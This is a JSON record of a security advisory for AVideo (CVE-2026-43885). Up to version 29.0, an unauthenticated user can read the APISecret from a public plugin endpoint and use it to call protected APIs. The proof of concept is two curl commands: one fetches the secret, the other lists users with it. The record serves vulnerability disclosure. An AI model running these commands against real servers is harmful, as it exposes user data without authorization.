{"uuid":"GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","url":"https://github.com/advisories/GHSA-xr49-f4rh-qcjf","title":"AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization","description":"### Summary\n  An unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints\n  (e.g. `users_list`) without logging in.\n\n  ### Details\n  `objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`.\n  That secret is accepted by `plugin/API/get.json.php` as authentication.\n\n  ### PoC\n  1. Get plugin config (contains `APISecret`):\n  ```bash\n  curl 'http://\u003chost\u003e/objects/plugins.json.php'\n```\n\u003cimg width=\"879\" height=\"94\" alt=\"image\" src=\"https://github.com/user-attachments/assets/027073fc-dccd-4e1d-8450-ad12345e88eb\" /\u003e\n\n  2. Copy APISecret from response, then call API directly:\n  ```bash\n  curl --get 'http://\u003chost\u003e/plugin/API/get.json.php' \\\n    --data-urlencode 'APIName=users_list' \\\n    --data-urlencode 'APISecret=\u003cAPISecret\u003e' \\\n    --data-urlencode 'rowCount=3' \\\n    --data-urlencode 'current=1'\n```\n\u003cimg width=\"1719\" height=\"170\" alt=\"image\" src=\"https://github.com/user-attachments/assets/edd629be-e75c-40a2-a52f-2f2e6da99b79\" /\u003e\n\n\n  ### Impact\n  Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.\n\n  ### Recommended fix\n  Requiring admin auth for full plugin inventory/config endpoint.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-05T22:20:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/WWBN/AVideo/security/advisories/GHSA-xr49-f4rh-qcjf","https://github.com/WWBN/AVideo/commit/1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b","https://nvd.nist.gov/vuln/detail/CVE-2026-43885","https://github.com/advisories/GHSA-xr49-f4rh-qcjf"],"source_kind":"github","identifiers":["GHSA-xr49-f4rh-qcjf","CVE-2026-43885"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T23:00:08.441Z","updated_at":"2026-05-14T12:00:29.391Z","epss_percentage":0.0005,"epss_percentile":0.15521,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-","packages":[{"ecosystem":"packagist","package_name":"wwbn/avideo","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 29.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cjQ5LWY0cmgtcWNqZs4ABWN-/related_packages","related_advisories":[]}